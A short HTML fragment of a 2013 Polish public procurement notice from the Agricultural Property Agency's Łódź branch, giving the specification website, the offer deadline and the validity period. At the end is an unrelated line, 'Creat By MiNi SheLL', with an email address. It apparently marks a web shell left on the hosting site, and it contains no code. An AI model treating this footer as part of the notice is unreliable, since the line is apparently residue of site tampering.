<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Warszawie Filia w Łodzi ul. Północna 27/29, 91-420 Łódź, województwo łódzkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2013 godzina 09:30, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy w Warszawie Filia w Łodzi ul. Północna 27/29, 91-420 Łódź. pok. 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com